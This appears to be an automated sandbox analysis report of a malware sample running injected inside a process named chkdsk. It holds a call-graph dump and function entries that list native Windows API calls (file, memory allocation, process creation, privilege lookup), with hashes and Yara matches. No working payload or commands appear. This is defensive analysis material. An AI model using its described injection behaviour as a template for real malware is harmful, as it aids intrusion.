33842->33845 33846 9844e1 33842->33846 33901 98a320 LdrLoadDll 33843->33901 33848 98a490 2 API calls 33845->33848 33849 9844fc 33846->33849 33850 9844e6 33846->33850 33847 98462e 33851 98a490 2 API calls 33847->33851 33852 9844d5 33848->33852 33858 984501 33849->33858 33889 98bf90 33849->33889 33853 98a490 2 API calls 33850->33853 33854 984639 33851->33854 33852->33783 33855 9844ef 33853->33855 33854->33783 33855->33783 33866 984513 33858->33866 33892 98a410 33858->33892 33859 984567 33860 98457e 33859->33860 33900 98a2a0 LdrLoadDll 33859->33900 33862 98459a 33860->33862 33863 984585 33860->33863 33865 98a490 2 API calls 33862->33865 33864 98a490 2 API calls 33863->33864 33864->33866 33867 9845a3 33865->33867 33866->33783 33868 9845cf 33867->33868 33895 98bb90 33867->33895 33868->33783 33870 9845ba 33871 98bdc0 2 API calls 33870->33871 33872 9845c3 33871->33872 33872->33783 33873->33752 33874->33778 33876 984d14 33875->33876 33877 98af60 LdrLoadDll 33875->33877 33878 98a320 LdrLoadDll 33876->33878 33877->33876 33878->33781 33880 98af60 LdrLoadDll 33879->33880 33881 98a4ac NtClose 33880->33881 33881->33785 33882->33765 33886 98a630 33883->33886 33885 98bfea 33885->33830 33887 98af60 LdrLoadDll 33886->33887 33888 98a64c RtlAllocateHeap 33887->33888 33888->33885 33890 98a630 2 API calls 33889->33890 33891 98bfa8 33890->33891 33891->33858 33893 98af60 LdrLoadDll 33892->33893 33894 98a42c NtReadFile 33893->33894 33894->33859 33896 98bb9d 33895->33896 33897 98bbb4 33895->33897 33896->33897 33898 98bf90 2 API calls 33896->33898 33897->33870 33899 98bbcb 33898->33899 33899->33870 33900->33860 33901->33847 33903 98bd6d 33902->33903 34032 98a540 33902->34032 33903->33790 33906 984081 33905->33906 33907 984089 33905->33907 33906->33793 33908 98435c 33907->33908 34035 98cf30 33907->34035 33908->33793 33910 9840dd 33911 98cf30 2 API calls 33910->33911 33915 9840e8 33911->33915 33912 984136 33914 98cf30 2 API calls 33912->33914 33918 98414a 33914->33918 33915->33912 33916 98d060 3 API calls 33915->33916 34049 98cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33915->34049 33916->33915 33917 9841a7 33919 98cf30 2 API calls 33917->33919 33918->33917 34040 98d060 33918->34040 33920 9841bd 33919->33920 33922 9841fa 33920->33922 33924 98d060 3 API calls 33920->33924 33923 98cf30 2 API calls 33922->33923 33925 984205 33923->33925 33924->33920 33926 98d060 3 API calls 33925->33926 33932 98423f 33925->33932 33926->33925 33929 98cf90 2 API calls 33930 98433e 33929->33930 33931 98cf90 2 API calls 33930->33931 33933 984348 33931->33933 34046 98cf90 33932->34046 33934 98cf90 2 API calls 33933->33934 33935 984352 33934->33935 33936 98cf90 2 API calls 33935->33936 33936->33908 33938 9853a1 33937->33938 33939 984a50 8 API calls 33938->33939 33941 9853b7 33939->33941 33940 98540a 33940->33797 33941->33940 33942 9853f2 33941->33942 33943 985405 33941->33943 33944 98bdc0 2 API calls 33942->33944 33945 98bdc0 2 API calls 33943->33945 33946 9853f7 33944->33946 33945->33940 33946->33797 34050 98ac30 33947->34050 33950 98ac30 LdrLoadDll 33951 98ad8d 33950->33951 33952 98ac30 LdrLoadDll 33951->33952 33953 98ad96 33952->33953 33954 98ac30 LdrLoadDll 33953->33954 33955 98ad9f 33954->33955 33956 98ac30 LdrLoadDll 33955->33956 33957 98ada8 33956->33957 33958 98ac30 LdrLoadDll 33957->33958 33959 98adb1 33958->33959 33960 98ac30 LdrLoadDll 33959->33960 33961 98adbd 33960->33961 33962 98ac30 LdrLoadDll 33961->33962 33963 98adc6 33962->33963 33964 98ac30 LdrLoadDll 33963->33964 33965 98adcf 33964->33965 33966 98ac30 LdrLoadDll 33965->33966 33967 98add8 33966->33967 33968 98ac30 LdrLoadDll 33967->33968 33969 98ade1 33968->33969 33970 98ac30 LdrLoadDll 33969->33970 33971 98adea 33970->33971 33972 98ac30 LdrLoadDll 33971->33972 33973 98adf6 33972->33973 33974 98ac30 LdrLoadDll 33973->33974 33975 98adff 33974->33975 33976 98ac30 LdrLoadDll 33975->33976 33977 98ae08 33976->33977 33978 98ac30 LdrLoadDll 33977->33978 33979 98ae11 33978->33979 33980 98ac30 LdrLoadDll 33979->33980 33981 98ae1a 33980->33981 33982 98ac30 LdrLoadDll 33981->33982 33983 98ae23 33982->33983 33984 98ac30 LdrLoadDll 33983->33984 33985 98ae2f 33984->33985 33986 98ac30 LdrLoadDll 33985->33986 33987 98ae38 33986->33987 33988 98ac30 LdrLoadDll 33987->33988 33989 98ae41 33988->33989 33990 98ac30 LdrLoadDll 33989->33990 33991 98ae4a 33990->33991 33992 98ac30 LdrLoadDll 33991->33992 33993 98ae53 33992->33993 33994 98ac30 LdrLoadDll 33993->33994 33995 98ae5c 33994->33995 33996 98ac30 LdrLoadDll 33995->33996 33997 98ae68 33996->33997 33998 98ac30 LdrLoadDll 33997->33998 33999 98ae71 33998->33999 34000 98ac30 LdrLoadDll 33999->34000 34001 98ae7a 34000->34001 34002 98ac30 LdrLoadDll 34001->34002 34003 98ae83 34002->34003 34004 98ac30 LdrLoadDll 34003->34004 34005 98ae8c 34004->34005 34006 98ac30 LdrLoadDll 34005->34006 34007 98ae95 34006->34007 34008 98ac30 LdrLoadDll 34007->34008 34009 98aea1 34008->34009 34010 98ac30 LdrLoadDll 34009->34010 34011 98aeaa 34010->34011 34012 98ac30 LdrLoadDll 34011->34012 34013 98aeb3 34012->34013 34014 98ac30 LdrLoadDll 34013->34014 34015 98aebc 34014->34015 34016 98ac30 LdrLoadDll 34015->34016 34017 98aec5 34016->34017 34018 98ac30 LdrLoadDll 34017->34018 34019 98aece 34018->34019 34020 98ac30 LdrLoadDll 34019->34020 34021 98aeda 34020->34021 34022 98ac30 LdrLoadDll 34021->34022 34023 98aee3 34022->34023 34024 98ac30 LdrLoadDll 34023->34024 34025 98aeec 34024->34025 34025->33801 34027 98af60 LdrLoadDll 34026->34027 34028 989edc 34027->34028 34056 53f9860 LdrInitializeThunk 34028->34056 34029 989ef3 34029->33722 34031->33798 34033 98a55c NtAllocateVirtualMemory 34032->34033 34034 98af60 LdrLoadDll 34032->34034 34033->33903 34034->34033 34036 98cf40 34035->34036 34037 98cf46 34035->34037 34036->33910 34038 98bf90 2 API calls 34037->34038 34039 98cf6c 34038->34039 34039->33910 34041 98cfd0 34040->34041 34042 98bf90 2 API calls 34041->34042 34043 98d02d 34041->34043 34044 98d00a 34042->34044 34043->33918 34045 98bdc0 2 API calls 34044->34045 34045->34043 34047 98bdc0 2 API calls 34046->34047 34048 984334 34047->34048 34048->33929 34049->33915 34051 98ac4b 34050->34051 34052 984e50 LdrLoadDll 34051->34052 34053 98ac6b 34052->34053 34054 984e50 LdrLoadDll 34053->34054 34055 98ad17 34053->34055 34054->34055 34055->33950 34056->34029 34058 53f968f LdrInitializeThunk 34057->34058 34059 53f9681 34057->34059 34058->33807 34059->33807 34061 98af60 LdrLoadDll 34060->34061 34062 98a68c RtlFreeHeap 34061->34062 34062->33811 34064 977eb0 34063->34064 34065 977eab 34063->34065 34066 98bd40 2 API calls 34064->34066 34065->33730 34069 977ed5 34066->34069 34067 977f38 34067->33730 34068 989ec0 2 API calls 34068->34069 34069->34067 34069->34068 34071 977f3e 34069->34071 34075 98bd40 2 API calls 34069->34075 34079 98a5c0 34069->34079 34070 977f64 34070->33730 34071->34070 34073 98a5c0 2 API calls 34071->34073 34074 977f55 34073->34074 34074->33730 34075->34069 34077 98a5c0 2 API calls 34076->34077 34078 97817e 34077->34078 34078->33686 34080 98af60 LdrLoadDll 34079->34080 34081 98a5dc 34080->34081 34084 53f96e0 LdrInitializeThunk 34081->34084 34082 98a5f3 34082->34069 34084->34082 34086 98b5c3 34085->34086 34089 97acf0 34086->34089 34088 979c4a 34088->33693 34091 97ad14 34089->34091 34090 97ad1b 34090->34088 34091->34090 34092 97ad67 34091->34092 34093 97ad50 LdrLoadDll 34091->34093 34092->34088 34093->34092 34095 97b063 34094->34095 34097 97b0e0 34095->34097 34109 989c90 LdrLoadDll 34095->34109 34097->33700 34099 98af60 LdrLoadDll 34098->34099 34100 97f1bb 34099->34100 34100->33703 34101 98a7d0 34100->34101 34102 98af60 LdrLoadDll 34101->34102 34103 98a7ef LookupPrivilegeValueW 34102->34103 34103->33705 34105 98a27c 34104->34105 34106 98af60 LdrLoadDll 34104->34106 34110 53f9910 LdrInitializeThunk 34105->34110 34106->34105 34107 98a29b 34107->33706 34109->34097 34110->34107 34112 97b1f0 34111->34112 34113 97b040 LdrLoadDll 34112->34113 34114 97b204 34113->34114 34114->33639 34116 97af34 34115->34116 34188 989c90 LdrLoadDll 34116->34188 34118 97af6e 34118->33641 34120 97f3ac 34119->34120 34121 97b1c0 LdrLoadDll 34120->34121 34122 97f3be 34121->34122 34189 97f290 34122->34189 34125 97f3f1 34128 97f402 34125->34128 34130 98a490 2 API calls 34125->34130 34126 97f3d9 34127 97f3e4 34126->34127 34129 98a490 2 API calls 34126->34129 34127->33645 34128->33645 34129->34127 34130->34128 34132 97f43c 34131->34132 34208 97b2b0 34132->34208 34134 97f44e 34135 97f290 3 API calls 34134->34135 34136 97f45f 34135->34136 34137 97f481 34136->34137 34138 97f469 34136->34138 34140 97f492 34137->34140 34142 98a490 2 API calls 34137->34142 34139 97f474 34138->34139 34141 98a490 2 API calls 34138->34141 34139->33647 34140->33647 34141->34139 34142->34140 34144 97caa6 34143->34144 34145 97cab0 34143->34145 34144->33656 34146 97af10 LdrLoadDll 34145->34146 34147 97cb4e 34146->34147 34148 97cb74 34147->34148 34149 97b040 LdrLoadDll 34147->34149 34148->33656 34150 97cb90 34149->34150 34151 984a50 8 API calls 34150->34151 34152 97cbe5 34151->34152 34152->33656 34154 97d646 34153->34154 34155 97b040 LdrLoadDll 34154->34155 34156 97d65a 34155->34156 34212 97d310 34156->34212 34159 97cc00 34160 97cc26 34159->34160 34161 97b040 LdrLoadDll 34160->34161 34162 97cca9 34160->34162 34161->34162 34163 97b040 LdrLoadDll 34162->34163 34164 97cd16 34163->34164 34165 97af10 LdrLoadDll 34164->34165 34166 97cd7f 34165->34166 34167 97b040 LdrLoadDll 34166->34167 34168 97ce2f 34167->34168 34168->33668 34170 978d14 34169->34170 34240 97f6d0 34169->34240 34172 978f25 34170->34172 34245 9843a0 34170->34245 34172->33624 34174 978d70 34174->34172 34248 978ab0 34174->34248 34177 98cf30 2 API calls 34178 978db2 34177->34178 34179 98d060 3 API calls 34178->34179 34184 978dc7 34179->34184 34180 977ea0 4 API calls 34180->34184 34183 97c7b0 18 API calls 34183->34184 34184->34172 34184->34180 34184->34183 34185 978160 2 API calls 34184->34185 34253 97f670 34184->34253 34257 97f080 21 API calls 34184->34257 34185->34184 34186->33649 34187->33666 34188->34118 34190 97f2aa 34189->34190 34198 97f360 34189->34198 34191 97b040 LdrLoadDll 34190->34191 34192 97f2cc 34191->34192 34199 989f40 34192->34199 34194 97f30e 34202 989f80 34194->34202 34197 98a490 2 API calls 34197->34198 34198->34125 34198->34126 34200 98af60 LdrLoadDll 34199->34200 34201 989f5c 34200->34201 34201->34194 34203 98af60 LdrLoadDll 34202->34203 34204 989f9c 34203->34204 34207 53f9fe0 LdrInitializeThunk 34204->34207 34205 97f354 34205->34197 34207->34205 34209 97b2d7 34208->34209 34210 97b040 LdrLoadDll 34209->34210 34211 97b313 34210->34211 34211->34134 34213 97d327 34212->34213 34220 97f710 34213->34220 34217 97d39b 34219 97908b 34217->34219 34231 98a2a0 LdrLoadDll 34217->34231 34219->34159 34221 97f735 34220->34221 34232 9781a0 34221->34232 34223 97d36f 34228 98a6e0 34223->34228 34224 984a50 8 API calls 34226 97f759 34224->34226 34226->34223 34226->34224 34227 98bdc0 2 API calls 34226->34227 34239 97f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34226->34239 34227->34226 34229 98af60 LdrLoadDll 34228->34229 34230 98a6ff CreateProcessInternalW 34229->34230 34230->34217 34231->34219 34233 97829f 34232->34233 34234 9781b5 34232->34234 34233->34226 34234->34233 34235 984a50 8 API calls 34234->34235 34236 978222 34235->34236 34237 98bdc0 2 API calls 34236->34237 34238 978249 34236->34238 34237->34238 34238->34226 34239->34226 34241 984e50 LdrLoadDll 34240->34241 34242 97f6ef 34241->34242 34243 97f6f6 SetErrorMode 34242->34243 34244 97f6fd 34242->34244 34243->34244 34244->34170 34258 97f4a0 34245->34258 34247 9843c6 34247->34174 34249 98bd40 2 API calls 34248->34249 34250 978ad5 34249->34250 34251 978cea 34250->34251 34277 989880 34250->34277 34251->34177 34254 97f683 34253->34254 34255 97f6ae 34254->34255 34326 989e90 34254->34326 34255->34184 34257->34184 34259 97f4bd 34258->34259 34265 989fc0 34259->34265 34262 97f505 34262->34247 34266 989fdc 34265->34266 34267 98af60 LdrLoadDll 34265->34267 34275 53f99a0 LdrInitializeThunk 34266->34275 34267->34266 34268 97f4fe 34268->34262 34270 98a010 34268->34270 34271 98af60 LdrLoadDll 34270->34271 34272 98a02c 34271->34272 34276 53f9780 LdrInitializeThunk 34272->34276 34273 97f52e 34273->34247 34275->34268 34276->34273 34278 98bf90 2 API calls 34277->34278 34279 989897 34278->34279 34298 979310 34279->34298 34281 9898b2 34282 9898d9 34281->34282 34283 9898f0 34281->34283 34284 98bdc0 2 API calls 34282->34284 34286 98bd40 2 API calls 34283->34286 34285 9898e6 34284->34285 34285->34251 34287 98992a 34286->34287 34288 98bd40 2 API calls 34287->34288 34289 989943 34288->34289 34295 989be4 34289->34295 34304 98bd80 LdrLoadDll 34289->34304 34291 989bc9 34292 989bd0 34291->34292 34291->34295 34293 98bdc0 2 API calls 34292->34293 34294 989bda 34293->34294 34294->34251 34296 98bdc0 2 API calls 34295->34296 34297 989c39 34296->34297 34297->34251 34299 979335 34298->34299 34300 97acf0 LdrLoadDll 34299->34300 34301 979368 34300->34301 34302 97938d 34301->34302 34305 97cf20 34301->34305 34302->34281 34304->34291 34306 97cf4c 34305->34306 34307 98a1e0 LdrLoadDll 34306->34307 34308 97cf65 34307->34308 34309 97cf6c 34308->34309 34316 98a220 34308->34316 34309->34302 34313 97cfa7 34314 98a490 2 API calls 34313->34314 34315 97cfca 34314->34315 34315->34302 34317 98a23c 34316->34317 34318 98af60 LdrLoadDll 34316->34318 34325 53f9710 LdrInitializeThunk 34317->34325 34318->34317 34319 97cf8f 34319->34309 34321 98a810 34319->34321 34322 98a811 34321->34322 34323 98af60 LdrLoadDll 34322->34323 34324 98a82f 34323->34324 34324->34313 34325->34319 34327 98af60 LdrLoadDll 34326->34327 34328 989eac 34327->34328 34331 53f9840 LdrInitializeThunk 34328->34331 34329 989ebb 34329->34255 34331->34329 34332 989080 34333 98bd40 2 API calls 34332->34333 34335 9890bb 34333->34335 34334 98919c 34335->34334 34336 97acf0 LdrLoadDll 34335->34336 34337 9890f1 34336->34337 34338 984e50 LdrLoadDll 34337->34338 34339 98910d 34338->34339 34339->34334 34340 989120 Sleep 34339->34340 34343 988ca0 LdrLoadDll 34339->34343 34344 988eb0 LdrLoadDll 34339->34344 34340->34339 34343->34339 34344->34339 34347 53f9540 LdrInitializeThunk

                    Executed Functions

                    Function 0098A35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 284 98a35a-98a35d 285 98a360-98a3a5 call 98af60 284->285 286 98a3a7-98a3b1 NtCreateFile 284->286 285->286
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00984BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00984BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0098A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: f35c1b23308f1b4c3e511d67d2b3f4f2f5b737bda8ebd33774cbe949afeb9734
                    • Instruction ID: 68c1c071407035a7d42796f3ab7362951b07f3de70595d02681a9655a8cd89ac
                    • Opcode Fuzzy Hash: f35c1b23308f1b4c3e511d67d2b3f4f2f5b737bda8ebd33774cbe949afeb9734
                    • Instruction Fuzzy Hash: 1301A4B2201108AFDB08DF88DC85EEB77ADAF8C754F158249FA09A7245C630F8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 289 98a360-98a3b1 call 98af60 NtCreateFile
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00984BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00984BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0098A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: cb19b6472d6b6d502c511bfedd602269fa4cf555954a9dd467324f97cc3d94b7
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: F4F0BDB2200208AFCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A45A Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 560 98a45a-98a45d 561 98a45f-98a489 call 98af60 560->561 562 98a410-98a459 call 98af60 NtReadFile 560->562
                    APIs
                    • NtReadFile.NTDLL(00984D72,5EB65239,FFFFFFFF,00984A31,?,?,00984D72,?,00984A31,FFFFFFFF,5EB65239,00984D72,?,00000000), ref: 0098A455
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 14860f70b1df318ed92c0b5e24e4106881b7a96749048ab34e0f980484a2c449
                    • Instruction ID: a2ca7e05675430676ec7e81588fc1b27c683a1619c06c3aaf9c8f0d144b2122a
                    • Opcode Fuzzy Hash: 14860f70b1df318ed92c0b5e24e4106881b7a96749048ab34e0f980484a2c449
                    • Instruction Fuzzy Hash: EC1127B2200208AFDB14EF98CC85EEB77A8EF8C754F118659BA0D97241C630E910CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A53A Relevance: 1.6, APIs: 1, Instructions: 57memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00972D11,00002000,00003000,00000004), ref: 0098A579
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 5311634b580f465503b5656b162f92f56a3ef50a22002ac76c572f22b043f40a
                    • Instruction ID: b5615c65d24e45456af3c9567104d41c0d35483afc403a8a9a32c2575b637e48
                    • Opcode Fuzzy Hash: 5311634b580f465503b5656b162f92f56a3ef50a22002ac76c572f22b043f40a
                    • Instruction Fuzzy Hash: 901169B2200208AFDB18DF88DC85EEB77ADEF88750F148559FA1D97241C630E810CBB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(00984D72,5EB65239,FFFFFFFF,00984A31,?,?,00984D72,?,00984A31,FFFFFFFF,5EB65239,00984D72,?,00000000), ref: 0098A455
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 9290a7743306a33b2263e8930dd9a247a3cabf2ce96174e80b066b46f7953c8f
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 78F0B7B2200208AFDB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00972D11,00002000,00003000,00000004), ref: 0098A579
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: 3ff5185c83d67d215228a2e2e7f1a876d58de941ed8526fc49096ced6a3b28bb
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 2FF015B2200208AFDB14DF89CC81EAB77ADEF88754F118149BE0897241C630F810CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(00984D50,?,?,00984D50,00000000,FFFFFFFF), ref: 0098A4B5
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: 2641b26a8663655ed39c4235207daaf98506baaa314c3033ef307e10d14ddba5
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: DDD012752002146BD710EB98CC45F97775CEF44750F154455BA185B242C530F50087E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0098A492 Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(00984D50,?,?,00984D50,00000000,FFFFFFFF), ref: 0098A4B5
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
                    • Instruction ID: 47406cf8f20e351a6034b495665d1bbbc4bf137c138fd19ca6f9f1e2505a7d2a
                    • Opcode Fuzzy Hash: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
                    • Instruction Fuzzy Hash: 6ED05E76200214BFE710EFA8CC85FE77B68EF88760F158599BA1CDB242C530E60087E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6cfa375fa7c36f7d7d89ade794aee184852eaf241723b3dc2e4d5aa8f9ec0115
                    • Instruction ID: 291a37811ac9d51a004770234199413161e8175963ec1c0e91717379304f3fc0
                    • Opcode Fuzzy Hash: 6cfa375fa7c36f7d7d89ade794aee184852eaf241723b3dc2e4d5aa8f9ec0115
                    • Instruction Fuzzy Hash: 33900265615000030105A5990744547006697D53A13A1D032F1005554CD7B188656161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1d400e0f912a880ed28845718fe30be6562fb2c042ad462059e6f049f1a0b1df
                    • Instruction ID: c6d18594c4c76d8d64e4ad7d4db4293df05b84d093993869cc9cf3b802660ed5
                    • Opcode Fuzzy Hash: 1d400e0f912a880ed28845718fe30be6562fb2c042ad462059e6f049f1a0b1df
                    • Instruction Fuzzy Hash: 189002A160600003410571994454656402A97E0251BA1D032E1004594DC6B588957165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 578cfde0bf2bfeac9564070e46ccbbe2cb8574b1b3ac2fab74f518e743fb10b8
                    • Instruction ID: 18f1836c98b3b07d90abd1c3bdae82a8c96a3dddc06dd578db436ff88b9b6b21
                    • Opcode Fuzzy Hash: 578cfde0bf2bfeac9564070e46ccbbe2cb8574b1b3ac2fab74f518e743fb10b8
                    • Instruction Fuzzy Hash: A990027160500402D10065D95448686002597E0351FA1E022A5014559EC7F588957171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b58cee979e6078c82dd6c2f142c0dfbba8a6e98b975cb071793d7cc26768ca07
                    • Instruction ID: 08569654eea577dcb9baed606074f1751786664432e30709b9fc766a56dbbe79
                    • Opcode Fuzzy Hash: b58cee979e6078c82dd6c2f142c0dfbba8a6e98b975cb071793d7cc26768ca07
                    • Instruction Fuzzy Hash: CA90026961700002D1807199544864A002597D1252FE1E426A000555CCCAA5886D6361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
